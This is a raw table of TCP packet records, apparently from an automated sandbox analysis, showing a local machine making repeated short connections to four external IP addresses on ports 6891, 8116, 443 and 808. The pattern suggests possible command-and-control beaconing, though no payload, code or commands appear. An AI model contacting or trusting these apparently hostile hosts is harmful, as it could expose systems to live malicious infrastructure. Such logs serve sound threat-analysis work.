Oct 28, 2021 05:11:32.812000990 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:32.812180996 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:32.812279940 CEST	49764	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:32.812789917 CEST	49764	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:32.817292929 CEST	49764	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:32.817444086 CEST	49764	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:32.983673096 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:32.983697891 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.022862911 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.370575905 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.370600939 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.370671988 CEST	49764	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.378479004 CEST	49764	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.486124039 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.547209978 CEST	6891	49764	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.652604103 CEST	6891	49765	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.652776957 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.653290987 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.819586992 CEST	6891	49765	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.819685936 CEST	6891	49765	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.819766998 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.820245981 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.824095011 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.824330091 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:33.990602016 CEST	6891	49765	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:33.990678072 CEST	6891	49765	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:34.384432077 CEST	6891	49765	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:34.384459019 CEST	6891	49765	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:34.384593010 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:34.384680986 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:34.392683983 CEST	49765	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:34.394927979 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.447009087 CEST	8116	49766	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:34.447160959 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.457339048 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.509309053 CEST	8116	49766	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:34.509530067 CEST	8116	49766	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:34.509629965 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.511734962 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.515762091 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.515902996 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.559106112 CEST	6891	49765	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:34.567739964 CEST	8116	49766	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:34.568340063 CEST	8116	49766	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:34.738157034 CEST	8116	49766	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:34.738214016 CEST	8116	49766	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:34.738446951 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.746803045 CEST	49766	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:34.798826933 CEST	8116	49766	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.414232969 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.462114096 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.462246895 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.463315964 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.512787104 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.512833118 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.512959957 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.513607025 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.518732071 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.518949986 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.566545010 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.566911936 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.567378044 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.751792908 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.751822948 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:35.751893044 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.751936913 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.754487038 CEST	49767	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:35.766985893 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:35.767035961 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:35.767117023 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:35.767769098 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:35.767793894 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:35.802169085 CEST	8116	49767	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:36.286551952 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:36.286672115 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:36.287218094 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:36.287228107 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:36.295607090 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:36.295619011 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:36.295780897 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:36.295789957 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:36.771878958 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:36.771923065 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:36.772047997 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:36.772680998 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:36.772692919 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:37.006180048 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:37.006268024 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:37.006500006 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:37.017837048 CEST	49768	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:37.017891884 CEST	443	49768	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:37.290288925 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:37.290515900 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:37.292001963 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:37.292015076 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:37.299253941 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:37.299269915 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:37.299433947 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:37.299443960 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:38.003284931 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:38.003401041 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:38.003509998 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:38.003704071 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:38.007241964 CEST	49769	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:38.007280111 CEST	443	49769	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:38.060340881 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.223571062 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.223803043 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.224529982 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.387212038 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.387285948 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.387543917 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.388324022 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.396569967 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.396683931 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.550924063 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.559343100 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.559366941 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.559379101 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.943785906 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.943806887 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:38.943887949 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.943921089 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:38.951843023 CEST	49770	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.063663006 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.114454985 CEST	808	49770	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.233792067 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.234181881 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.235088110 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.405019999 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.405194998 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.405368090 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.406181097 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.414865971 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.415106058 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.576069117 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.584956884 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.584970951 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.585026979 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.965265036 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.965281963 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:39.966263056 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.971662045 CEST	49771	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:39.976581097 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.141539097 CEST	808	49771	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:40.141742945 CEST	6891	49772	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:40.141870022 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.142658949 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.307806015 CEST	6891	49772	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:40.307888985 CEST	6891	49772	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:40.307964087 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.308540106 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.313517094 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.313543081 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.479825020 CEST	6891	49772	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:40.479861021 CEST	6891	49772	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:40.857574940 CEST	6891	49772	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:40.857613087 CEST	6891	49772	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:40.857705116 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.857723951 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:40.863297939 CEST	49772	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.028559923 CEST	6891	49772	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.055284023 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.221749067 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.221909046 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.222759962 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.389034986 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.389157057 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.389225960 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.390763044 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.396747112 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.396904945 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.563127041 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.563153028 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.563169956 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.873557091 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:41.922676086 CEST	8116	49774	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:41.922794104 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:41.925004005 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:41.946620941 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.946650028 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:41.946707010 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.946742058 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.949336052 CEST	49773	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:41.973660946 CEST	8116	49774	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:41.974191904 CEST	8116	49774	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:41.974311113 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:41.975558996 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:41.980309010 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:41.980405092 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:42.029288054 CEST	8116	49774	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:42.115708113 CEST	6891	49773	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:42.217930079 CEST	8116	49774	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:42.217959881 CEST	8116	49774	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:42.218075991 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:42.218130112 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:42.224833012 CEST	49774	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:42.274945974 CEST	8116	49774	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:42.972498894 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.026010036 CEST	8116	49775	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:43.027342081 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.028018951 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.081013918 CEST	8116	49775	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:43.081183910 CEST	8116	49775	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:43.082149982 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.085094929 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.088695049 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.088778973 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.141900063 CEST	8116	49775	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:43.232346058 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:43.232386112 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:43.232465982 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:43.233208895 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:43.233221054 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:43.314279079 CEST	8116	49775	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:43.314301968 CEST	8116	49775	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:43.314651012 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.320313931 CEST	49775	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:43.373259068 CEST	8116	49775	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:43.719078064 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:43.719243050 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:43.719738007 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:43.719757080 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:43.731741905 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:43.731761932 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:43.731853008 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:43.731862068 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.408232927 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.408272982 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.408397913 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.409248114 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.409267902 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.420181036 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.420262098 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.420262098 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.420315027 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.426898956 CEST	49776	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.426939964 CEST	443	49776	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.893951893 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.894032955 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.894579887 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.894594908 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.898879051 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.898896933 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:44.898992062 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:44.899003029 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:45.449604988 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:45.585727930 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:45.585812092 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:45.585916996 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:45.589366913 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:45.589399099 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:45.626015902 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:45.626485109 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:45.627269030 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:45.801115990 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:45.801147938 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:45.801316023 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:45.801860094 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:45.807884932 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:45.807975054 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:45.974392891 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:45.981679916 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:45.981708050 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:45.981723070 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:46.367660046 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:46.367696047 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:46.367811918 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:46.377108097 CEST	49780	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:46.549742937 CEST	808	49780	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:46.640916109 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:46.806801081 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:46.806957006 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:46.807845116 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:46.973506927 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:46.973639011 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:46.973731041 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:46.974212885 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:46.978348970 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:46.978483915 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:47.140594006 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:47.144876957 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:47.145301104 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:47.145328999 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:47.389081955 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:47.532905102 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:47.532927036 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:47.533056021 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:47.533088923 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:47.535428047 CEST	49781	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:47.555504084 CEST	6891	49782	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:47.555639029 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:47.556128025 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:47.701215029 CEST	808	49781	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:47.722480059 CEST	6891	49782	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:47.722621918 CEST	6891	49782	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:47.722704887 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:47.725701094 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:47.731199980 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:47.731484890 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:47.897629023 CEST	6891	49782	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:47.897706032 CEST	6891	49782	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:48.293838024 CEST	6891	49782	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:48.293865919 CEST	6891	49782	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:48.293955088 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:48.301106930 CEST	49782	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:48.467705011 CEST	6891	49782	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:48.548815966 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:48.715352058 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:48.717067003 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:48.717739105 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:48.884105921 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:48.884202957 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:48.884291887 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:48.884934902 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:48.890146017 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:48.890279055 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:49.056684017 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:49.056709051 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:49.056716919 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:49.311460972 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.360527992 CEST	8116	49784	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:49.360706091 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.361391068 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.410096884 CEST	8116	49784	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:49.410366058 CEST	8116	49784	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:49.410491943 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.411026001 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.416909933 CEST	49784	8116	192.168.2.3	185.56.219.47
